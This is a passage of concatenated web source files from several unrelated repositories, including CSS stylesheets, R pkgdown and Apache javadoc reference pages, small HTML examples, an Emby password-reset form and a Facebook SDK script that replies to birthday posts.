2s infinite ease-in; } .curse_btn button, .curse_btn a { height: 200px; background: #c9394a; text-align: center; color: #fff; font-size: 24px; line-height: 200px; cursor: pointer; display: block; overflow: hidden; opacity: 0.5; text-decoration: none; } .curse_btn a:hover { opacity: 1; line-height: 208px; } .course-list .course-left { background: #fff; box-shadow: 0 2px 4px rgba(0,0,0,0.1); padding: 30px 40px 40px; font-family: "microsoft yahei"; } .chapter-introduces .chapter-title { font-size: 20px; } .chapter-introduces .chapter-content { font-size: 14px; line-height: 24px; word-break: break-all; white-space: normal; } .chapter-catalog-list { margin-top: 20px; border: 0; } .chapter-catalog-list .panel-heading { font-size: 20px; background: #fff; padding: 0 0 12px 0; } .chapter-catalog-list .list-group { margin-bottom: 0; } .chapter-catalog-list .panel-body { padding: 0; } .chapter-catalog-list .list-group-item { color: #777; border: 0; margin-top: 10px; cursor: pointer; } .chapter-catalog-list .list-group-item:hover .media-left a{ color: #00AAEE; } .chapter-catalog-list .list-group-item:hover .media-heading { color: #00AAEE; } .chapter-catalog-list .media-descript { font-size: 12px; } .chapter-catalog-list .media-left { padding-right: 20px; } .chapter-catalog-list .media-left a { color: #ccc; transition: 0s; } .course-right { font-family: "microsoft yahei"; padding-right: 0; } .course-right .panel { padding: 0 20px; border: 0; background: #fff; box-shadow: 0 2px 5px rgba(0,0,0,0.2); } .course-right .panel-heading { background: #fff; padding-left: 0; font-size: 16px; } .course-right .panel-body { padding-left: 0; } .course-right .media-body { vertical-align: middle; font-size: 12px; color: #888; } .course-right .media-body a { color: #222; font-size: 16px; } .course-right .teacher-desc { color:#888888; font-size: 12px; line-height: 25px; margin-top: 10px; margin-left: 10px; margin-right: 10px; } .course-right .panel-body { color:#888888; font-size: 12px; line-height: 22px; } .course-right .wrd_break { white-space: pre-wrap; white-space: -moz-pre-wrap; white-space: -pre-wrap; white-space: -o-pre-wrap; word-wrap: break-word; font-family: Microsoft YaHei,​SimSun,​Arial; font-size: 12px; }
docs/reference/nCores.html
jasenfinch/OrbiFIEproc
<!-- Generated by pkgdown: do not edit by hand --> <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>nCores — nCores • binneR</title> <!-- jquery --> <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.min.js" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"></script> <!-- Bootstrap --> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.4.1/css/bootstrap.min.css" integrity="sha256-bZLfwXAP04zRMK2BjiO8iu9pf4FbLqX6zitd+tIvLhE=" crossorigin="anonymous" /> <script src="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.4.1/js/bootstrap.min.js" integrity="sha256-nuL8/2cJ5NDSSwnKD8VqreErSWHtnEP9E7AySL+1ev4=" crossorigin="anonymous"></script> <!-- bootstrap-toc --> <link rel="stylesheet" href="../bootstrap-toc.css"> <script src="../bootstrap-toc.js"></script> <!-- Font Awesome icons --> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.12.1/css/all.min.css" integrity="sha256-mmgLkCYLUQbXn0B1SRqzHar6dCnv9oZFPEC1g1cwlkk=" crossorigin="anonymous" /> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.12.1/css/v4-shims.min.css" integrity="sha256-wZjR52fzng1pJHwx4aV2AO3yyTOXrcDW7jBpJtTwVxw=" crossorigin="anonymous" /> <!-- clipboard.js --> <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.6/clipboard.min.js" integrity="sha256-inc5kl9MA1hkeYUt+EC3BhlIgyp/2jDIyBLS6k3UxPI=" crossorigin="anonymous"></script> <!-- headroom.js --> <script src="https://cdnjs.cloudflare.com/ajax/libs/headroom/0.11.0/headroom.min.js" integrity="sha256-AsUX4SJE1+yuDu5+mAVzJbuYNPHj/WroHuZ8Ir/CkE0=" crossorigin="anonymous"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/headroom/0.11.0/jQuery.headroom.min.js" integrity="sha256-ZX/yNShbjqsohH1k95liqY9Gd8uOiE1S4vZc+9KQ1K4=" crossorigin="anonymous"></script> <!-- pkgdown --> <link href="../pkgdown.css" rel="stylesheet"> <script src="../pkgdown.js"></script> <meta property="og:title" content="nCores — nCores" /> <meta property="og:description" content="get and set number of cores of a BinParameters object." /> <!-- mathjax --> <script src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/MathJax.js" integrity="sha256-nvJJv9wWKEm88qvoQl9ekL2J+k/RWIsaSScxxlsrv8k=" crossorigin="anonymous"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/config/TeX-AMS-MML_HTMLorMML.js" integrity="sha256-84DKXVJXs0/F8OTMzX4UR909+jtl4G7SPypPavF+GfA=" crossorigin="anonymous"></script> <!--[if lt IE 9]> <script src="https://oss.maxcdn.com/html5shiv/3.7.3/html5shiv.min.js"></script> <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script> <![endif]--> </head> <body data-spy="scroll" data-target="#toc"> <div class="container template-reference-topic"> <header> <div class="navbar navbar-default navbar-fixed-top" role="navigation"> <div class="container"> <div class="navbar-header"> <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <span class="navbar-brand"> <a class="navbar-link" href="../index.html">binneR</a> <span class="version label label-default" data-toggle="tooltip" data-placement="bottom" title="Released version">2.4.0</span> </span> </div> <div id="navbar" class="navbar-collapse collapse"> <ul class="nav navbar-nav"> <li> <a href="../index.html"> <span class="fas fa fas fa-home fa-lg"></span> </a> </li> <li> <a href="../articles/binneR.html">Get started</a> </li> <li> <a href="../reference/index.html">Reference</a> </li> </ul> <ul class="nav navbar-nav navbar-right"> <li> <a href="https://github.com/aberHRML/binneR/"> <span class="fab fa fab fa-github fa-lg"></span> </a> </li> </ul> </div><!--/.nav-collapse --> </div><!--/.container --> </div><!--/.navbar --> </header> <div class="row"> <div class="col-md-9 contents"> <div class="page-header"> <h1>nCores</h1> <small class="dont-index">Source: <a href='https://github.com/aberHRML/binneR/blob/master/R/allGenerics.R'><code>R/allGenerics.R</code></a>, <a href='https://github.com/aberHRML/binneR/blob/master/R/binParameters.R'><code>R/binParameters.R</code></a></small> <div class="hidden name"><code>nCores.Rd</code></div> </div> <div class="ref-description"> <p>get and set number of cores of a BinParameters object.</p> </div> <pre class="usage"><span class='fu'>nCores</span><span class='op'>(</span><span class='va'>x</span><span class='op'>)</span> <span class='co'># S4 method for BinParameters</span> <span class='fu'>nCores</span><span class='op'>(</span><span class='va'>x</span><span class='op'>)</span> <span class='fu'>nCores</span><span class='op'>(</span><span class='va'>x</span><span class='op'>)</span> <span class='op'>&lt;-</span> <span class='va'>value</span></pre> <h2 class="hasAnchor" id="arguments"><a class="anchor" href="#arguments"></a>Arguments</h2> <table class="ref-arguments"> <colgroup><col class="name" /><col class="desc" /></colgroup> <tr> <th>x</th> <td><p>an S4 object of class BinParameters</p></td> </tr> <tr> <th>value</th> <td><p>number of cores to use for parallel processing</p></td> </tr> </table> </div> <div class="col-md-3 hidden-xs hidden-sm" id="pkgdown-sidebar"> <nav id="toc" data-toggle="toc" class="sticky-top"> <h2 data-toc-skip>Contents</h2> </nav> </div> </div> <footer> <div class="copyright"> <p>Developed by Jasen Finch.</p> </div> <div class="pkgdown"> <p>Site built with <a href="https://pkgdown.r-lib.org/">pkgdown</a> 1.6.1.</p> </div> </footer> </div> </body> </html>
libraries/httpcomponents-client-4.2.5/javadoc/org/apache/http/conn/ssl/TrustStrategy.html
jswelker/LibraryH3lp-Transfer-Bot
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!--NewPage--> <HTML> <HEAD> <!-- Generated by javadoc (build 1.5.0_22) on Fri Apr 19 18:20:46 CEST 2013 --> <META http-equiv="Content-Type" content="text/html; charset=UTF-8"> <TITLE> TrustStrategy (HttpComponents Client 4.2.5 API) </TITLE> <META NAME="keywords" CONTENT="org.apache.http.conn.ssl.TrustStrategy interface"> <LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../../stylesheet.css" TITLE="Style"> <SCRIPT type="text/javascript"> function windowTitle() { parent.document.title="TrustStrategy (HttpComponents Client 4.2.5 API)"; } </SCRIPT> <NOSCRIPT> </NOSCRIPT> </HEAD> <BODY BGCOLOR="white" onload="windowTitle();"> <!-- ========= START OF TOP NAVBAR ======= --> <A NAME="navbar_top"><!-- --></A> <A HREF="#skip-navbar_top" title="Skip navigation links"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_top_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Class</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="class-use/TrustStrategy.html"><FONT CLASS="NavBarFont1"><B>Use</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;<A HREF="../../../../../org/apache/http/conn/ssl/TrustSelfSignedStrategy.html" title="class in org.apache.http.conn.ssl"><B>PREV CLASS</B></A>&nbsp; &nbsp;<A HREF="../../../../../org/apache/http/conn/ssl/X509HostnameVerifier.html" title="interface in org.apache.http.conn.ssl"><B>NEXT CLASS</B></A></FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../../../index.html?org/apache/http/conn/ssl/TrustStrategy.html" target="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="TrustStrategy.html" target="_top"><B>NO FRAMES</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../../../../../allclasses-noframe.html"><B>All Classes</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../../../../../allclasses-noframe.html"><B>All Classes</B></A> </NOSCRIPT> </FONT></TD> </TR> <TR> <TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2"> SUMMARY:&nbsp;NESTED&nbsp;|&nbsp;FIELD&nbsp;|&nbsp;CONSTR&nbsp;|&nbsp;<A HREF="#method_summary">METHOD</A></FONT></TD> <TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2"> DETAIL:&nbsp;FIELD&nbsp;|&nbsp;CONSTR&nbsp;|&nbsp;<A HREF="#method_detail">METHOD</A></FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_top"></A> <!-- ========= END OF TOP NAVBAR ========= --> <HR> <!-- ======== START OF CLASS DATA ======== --> <H2> <FONT SIZE="-1"> org.apache.http.conn.ssl</FONT> <BR> Interface TrustStrategy</H2> <DL> <DT><B>All Known Implementing Classes:</B> <DD><A HREF="../../../../../org/apache/http/conn/ssl/TrustSelfSignedStrategy.html" title="class in org.apache.http.conn.ssl">TrustSelfSignedStrategy</A></DD> </DL> <HR> <DL> <DT><PRE>public interface <B>TrustStrategy</B></DL> </PRE> <P> A strategy to establish trustworthiness of certificates without consulting the trust manager configured in the actual SSL context. This interface can be used to override the standard JSSE certificate verification process. <P> <P> <DL> <DT><B>Since:</B></DT> <DD>4.1</DD> </DL> <HR> <P> <!-- ========== METHOD SUMMARY =========== --> <A NAME="method_summary"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2"> <B>Method Summary</B></FONT></TH> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;boolean</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../../org/apache/http/conn/ssl/TrustStrategy.html#isTrusted(java.security.cert.X509Certificate[], java.lang.String)">isTrusted</A></B>(<A HREF="http://download.oracle.com/javase/1.5.0/docs/api/java/security/cert/X509Certificate.html" title="class or interface in java.security.cert">X509Certificate</A>[]&nbsp;chain, <A HREF="http://download.oracle.com/javase/1.5.0/docs/api/java/lang/String.html" title="class or interface in java.lang">String</A>&nbsp;authType)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Determines whether the certificate chain can be trusted without consulting the trust manager configured in the actual SSL context.</TD> </TR> </TABLE> &nbsp; <P> <!-- ============ METHOD DETAIL ========== --> <A NAME="method_detail"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="1"><FONT SIZE="+2"> <B>Method Detail</B></FONT></TH> </TR> </TABLE> <A NAME="isTrusted(java.security.cert.X509Certificate[], java.lang.String)"><!-- --></A><H3> isTrusted</H3> <PRE> boolean <B>isTrusted</B>(<A HREF="http://download.oracle.com/javase/1.5.0/docs/api/java/security/cert/X509Certificate.html" title="class or interface in java.security.cert">X509Certificate</A>[]&nbsp;chain, <A HREF="http://download.oracle.com/javase/1.5.0/docs/api/java/lang/String.html" title="class or interface in java.lang">String</A>&nbsp;authType) throws <A HREF="http://download.oracle.com/javase/1.5.0/docs/api/java/security/cert/CertificateException.html" title="class or interface in java.security.cert">CertificateException</A></PRE> <DL> <DD>Determines whether the certificate chain can be trusted without consulting the trust manager configured in the actual SSL context. This method can be used to override the standard JSSE certificate verification process. <p> Please note that, if this method returns <code>false</code>, the trust manager configured in the actual SSL context can still clear the certificate as trusted. <P> <DD><DL> <DT><B>Parameters:</B><DD><CODE>chain</CODE> - the peer certificate chain<DD><CODE>authType</CODE> - the authentication type based on the client certificate <DT><B>Returns:</B><DD><code>true</code> if the certificate can be trusted without verification by the trust manager, <code>false</code> otherwise. <DT><B>Throws:</B> <DD><CODE><A HREF="http://download.oracle.com/javase/1.5.0/docs/api/java/security/cert/CertificateException.html" title="class or interface in java.security.cert">CertificateException</A></CODE> - thrown if the certificate is not trusted or invalid.</DL> </DD> </DL> <!-- ========= END OF CLASS DATA ========= --> <HR> <!-- ======= START OF BOTTOM NAVBAR ====== --> <A NAME="navbar_bottom"><!-- --></A> <A HREF="#skip-navbar_bottom" title="Skip navigation links"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_bottom_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Class</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="class-use/TrustStrategy.html"><FONT CLASS="NavBarFont1"><B>Use</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;<A HREF="../../../../../org/apache/http/conn/ssl/TrustSelfSignedStrategy.html" title="class in org.apache.http.conn.ssl"><B>PREV CLASS</B></A>&nbsp; &nbsp;<A HREF="../../../../../org/apache/http/conn/ssl/X509HostnameVerifier.html" title="interface in org.apache.http.conn.ssl"><B>NEXT CLASS</B></A></FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../../../index.html?org/apache/http/conn/ssl/TrustStrategy.html" target="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="TrustStrategy.html" target="_top"><B>NO FRAMES</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../../../../../allclasses-noframe.html"><B>All Classes</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../../../../../allclasses-noframe.html"><B>All Classes</B></A> </NOSCRIPT> </FONT></TD> </TR> <TR> <TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2"> SUMMARY:&nbsp;NESTED&nbsp;|&nbsp;FIELD&nbsp;|&nbsp;CONSTR&nbsp;|&nbsp;<A HREF="#method_summary">METHOD</A></FONT></TD> <TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2"> DETAIL:&nbsp;FIELD&nbsp;|&nbsp;CONSTR&nbsp;|&nbsp;<A HREF="#method_detail">METHOD</A></FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_bottom"></A> <!-- ======== END OF BOTTOM NAVBAR ======= --> <HR> Copyright &#169; 1999-2013 <a href="http://www.apache.org/">The Apache Software Foundation</a>. All Rights Reserved. </BODY> </HTML>
luci/applications/luci-mjpg-streamer/root/www/webcam/static_simple.html
yetsky/extra
<html> <head> <title>MJPG-Streamer - Static Example</title> </head> <body> <center> <img src="/?action=snapshot" alt="This is a static snapshot" /> </center> </body> </html>
Coding/W3School/W3CN/www.w3school.com.cn/tiy/loadtext44d7.html
platinhom/ManualHom
<html> <!-- Mirrored from www.w3school.com.cn/tiy/loadtext.asp?f=jseg_sort_1 by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 02 Dec 2015 05:04:23 GMT --> <!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=GB2312" /><!-- /Added by HTTrack --> <body> <script type="text/javascript"> var arr = new Array(6) arr[0] = "George" arr[1] = "John" arr[2] = "Thomas" arr[3] = "James" arr[4] = "Adrew" arr[5] = "Martin" document.write(arr + "<br />") document.write(arr.sort()) </script> </body> <!-- Mirrored from www.w3school.com.cn/tiy/loadtext.asp?f=jseg_sort_1 by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 02 Dec 2015 05:04:23 GMT --> </html>
docs/api/org/apache/nutch/protocol/ftp/package-frame.html
tyolab/tyobot
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!--NewPage--> <HTML> <HEAD> <!-- Generated by javadoc (build 1.6.0_23) on Fri Sep 21 15:53:23 BST 2012 --> <TITLE> org.apache.nutch.protocol.ftp (apache-nutch 2.1 API) </TITLE> <META NAME="date" CONTENT="2012-09-21"> <LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../../stylesheet.css" TITLE="Style"> </HEAD> <BODY BGCOLOR="white"> <FONT size="+1" CLASS="FrameTitleFont"> <A HREF="../../../../../org/apache/nutch/protocol/ftp/package-summary.html" target="classFrame">org.apache.nutch.protocol.ftp</A></FONT> <TABLE BORDER="0" WIDTH="100%" SUMMARY=""> <TR> <TD NOWRAP><FONT size="+1" CLASS="FrameHeadingFont"> Classes</FONT>&nbsp; <FONT CLASS="FrameItemFont"> <BR> <A HREF="Client.html" title="class in org.apache.nutch.protocol.ftp" target="classFrame">Client</A> <BR> <A HREF="Ftp.html" title="class in org.apache.nutch.protocol.ftp" target="classFrame">Ftp</A> <BR> <A HREF="FtpResponse.html" title="class in org.apache.nutch.protocol.ftp" target="classFrame">FtpResponse</A> <BR> <A HREF="PrintCommandListener.html" title="class in org.apache.nutch.protocol.ftp" target="classFrame">PrintCommandListener</A></FONT></TD> </TR> </TABLE> <TABLE BORDER="0" WIDTH="100%" SUMMARY=""> <TR> <TD NOWRAP><FONT size="+1" CLASS="FrameHeadingFont"> Exceptions</FONT>&nbsp; <FONT CLASS="FrameItemFont"> <BR> <A HREF="FtpError.html" title="class in org.apache.nutch.protocol.ftp" target="classFrame">FtpError</A> <BR> <A HREF="FtpException.html" title="class in org.apache.nutch.protocol.ftp" target="classFrame">FtpException</A> <BR> <A HREF="FtpExceptionBadSystResponse.html" title="class in org.apache.nutch.protocol.ftp" target="classFrame">FtpExceptionBadSystResponse</A> <BR> <A HREF="FtpExceptionCanNotHaveDataConnection.html" title="class in org.apache.nutch.protocol.ftp" target="classFrame">FtpExceptionCanNotHaveDataConnection</A> <BR> <A HREF="FtpExceptionControlClosedByForcedDataClose.html" title="class in org.apache.nutch.protocol.ftp" target="classFrame">FtpExceptionControlClosedByForcedDataClose</A> <BR> <A HREF="FtpExceptionUnknownForcedDataClose.html" title="class in org.apache.nutch.protocol.ftp" target="classFrame">FtpExceptionUnknownForcedDataClose</A></FONT></TD> </TR> </TABLE> </BODY> </HTML>
doc/allclasses-noframe.html
fabinhodsouza/metodos_avancados_uepb
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="pt"> <head> <!-- Generated by javadoc (1.8.0_25) on Tue Mar 24 10:53:23 BRT 2015 --> <title>All Classes</title> <meta name="date" content="2015-03-24"> <link rel="stylesheet" type="text/css" href="stylesheet.css" title="Style"> <script type="text/javascript" src="script.js"></script> </head> <body> <h1 class="bar">All&nbsp;Classes</h1> <div class="indexContainer"> <ul> <li><a href="model/automovel/Carro.html" title="class in model.automovel">Carro</a></li> <li><a href="controller/CarroController.html" title="class in controller">CarroController</a></li> <li><a href="testes/CarroTest.html" title="class in testes">CarroTest</a></li> <li><a href="application/Main.html" title="class in application">Main</a></li> <li><a href="model/automovel/Moto.html" title="class in model.automovel">Moto</a></li> <li><a href="controller/MotoController.html" title="class in controller">MotoController</a></li> <li><a href="testes/MotoTest.html" title="class in testes">MotoTest</a></li> <li><a href="model/Placa.html" title="class in model">Placa</a></li> <li><a href="model/automovel/Veiculo.html" title="class in model.automovel">Veiculo</a></li> </ul> </div> </body> </html>
MediaBrowser.WebDashboard/dashboard-ui/forgotpassword.html
hatharry/Emby
<div data-role="page" id="forgotPasswordPage" class="page standalonePage forgotPasswordPage" data-theme="b"> <div> <form class="forgotPasswordForm" style="text-align: center; margin: 0 auto;"> <div style="text-align: left;"> <h1>${HeaderForgotPassword}</h1> <div class="inputContainer"> <input is="emby-input" type="text" id="txtName" label="${LabelUser}" autocomplete="off"/> <div class="fieldDescription">${LabelForgotPasswordUsernameHelp}</div> </div> <div> <button is="emby-button" type="submit" class="raised submit block"> <span>${ButtonSubmit}</span> </button> <button is="emby-button" type="button" class="raised cancel block btnCancel" onclick="history.back();"> <span>${ButtonCancel}</span> </button> </div> </div> </form> </div> </div>
birthday-wisher.html
vivekhas3/birthday-complementor
<html> <head> <title>Facebook Birthday Complements</title> </head> <body> <label>Comment:</label> <input type="text" name="comment" id="comment" /> <input type="button" id="post-comment" name="post-comment" value="post-comment" /> <!-- jQuery 2.0.2 --> <script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.2/jquery.min.js"></script> <script> function post_to_wish(response) { $.each(response.data, function(i,item){ console.log(item.id + "/comments"); FB.api( "/{object-id}/comments", "POST", { "object": { "message": $("#comment").val() } }, function (response) { if (response && !response.error) { } } ); }); } window.fbAsyncInit = function() { FB.init({ appId : '526475997460965', xfbml : false, version : 'v2.0', status : true }); }; (function(d, s, id){ var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) {return;} js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/en_US/sdk.js"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk')); function post_comment() { // FB.login(function(){}, {scope: 'publish_actions'}); FB.login(function(){ FB.api( "/me/feed?fields=created_time,from&until=1396224000&since=1396051200&limit=100", function (response) { if (response && !response.error) { /* handle the result */ post_to_wish(response); } } ); }, {scope: 'read_stream'}); alert($("#comment").val()); console.log($("#comment").val()); } $(document).ready(function() { $("#post-comment").on("click", post_comment); }); </script> </body> </html>
style.css
everythingtype/calcott
/* Theme Name: Calcott 2b Theme URI: http://github.com/everythingtype/calcott Author: Marty Spellerberg Author URI: http://www.martyspellerberg.com/ Designed by Everything Type Company, http://www.etc-nyc.com/ Developed by Marty Spellerberg, http://www.martyspellerberg.com/ */ body { font-family: 'PxGroteskBold', sans-serif; -webkit-font-smoothing: antialiased; text-rendering: optimizeLegibility; font-size: 20px; line-height: 1.5; background: #fff; color: #000; margin: 0; padding: 0; } body.haslightbox { overflow: hidden; } a {text-decoration: none; -webkit-transition: color 0.2s ease; -moz-transition: color 0.2s ease; -o-transition: color 0.2s ease; transition: color 0.2s ease; } a img { border: none; } *:focus { outline: none; } h1, h2, h3, h4, h5 { font-weight: normal; } .maxwidth { max-width: 1440px; margin: auto; } .layout img { max-width: 100%; max-height: 100%; } @media screen and (min-width: 950px) { .responsivecue { float: right; } } /* Header */ .header .mask { background: #fff; } .js .header { width: 100%; z-index: 4; position: fixed; top: 0; left: 0; } .header .padding { overflow: hidden; text-align: center; position: relative; padding: 12px 20px 0 20px; } .header .line {border-bottom: 2px solid #E2E2E3; clear: both;} .header h1 { font-size: 20px; margin: 0; float: left; } .header h1 a {color: #000;} .menutoggle { float: right; } .menutoggle span { display: none; } .menutoggle h4 { margin: 0; } .js .menutoggle h4 { cursor: pointer; } /* .openmenu svg { fill: #000; } .closemenu svg { fill: #3e7be4; } */ .topnav { display: none; } .sitenav { display: none; } @media screen and (min-width: 950px) { .header .padding { padding: 4px 20px 0 20px; } .menutoggle { display: none; } .topnav { display: block; float: right; overflow: hidden; display: none; } .js .topnav { display: block; } .topnav ul { margin: 0; padding: 0; list-style: none; } .topnav li { margin: 0; padding: 0 0 0 1em; display: block; float: left; } .topnav a {color: #8a8b8e;} .topnav a:hover { color: #3e7be4; } .topnav .active a { color: #3e7be4; } .sitenav { display: inline; } .sitenav ul { margin: 0; padding: 0; list-style: none;} .sitenav li { margin: 0; padding: 0;} .sitenav a { color: #8a8b8e; display: block; float: left; margin-left: 1em; } .sitenav a:hover {color: #000;} } /* Mobile Nav */ .lightbox { position: fixed; top: 0; right: 0; bottom: 0; left: 0; overflow: hidden; background: #fff; z-index: 3; } .lightbox .box { height: 100%; overflow: auto; position: relative; overflow-y: scroll; -webkit-overflow-scrolling: touch; } .mobilenav {} .mobilenav a {color: #8a8b8e;} .mobilenav a:hover { color: #3e7be4; } .mobilenav ul { margin: 9px 20px; padding: 0; list-style: none; } .mobilenav li { margin: 0; padding: 0; } /**/ .breadcrumbs { display: none; } .pagetitle { width: 100%; text-align: center; padding-top: 7px; position: fixed; top: 36px; left: 0; z-index: 2; -webkit-transition: opacity 0.2s ease; -moz-transition: opacity 0.2s ease; -o-transition: opacity 0.2s ease; transition: opacity 0.2s ease; } .pagetitle h2 { font-size: 20px; margin: 11px 20px; line-height: 1; } .pagetitle a {color: #000;} .pagetitle span { display: block; margin-top: 8px; } .pagetitle a.showinfo { display: inline-block; font-size: 14px; cursor: pointer; color: 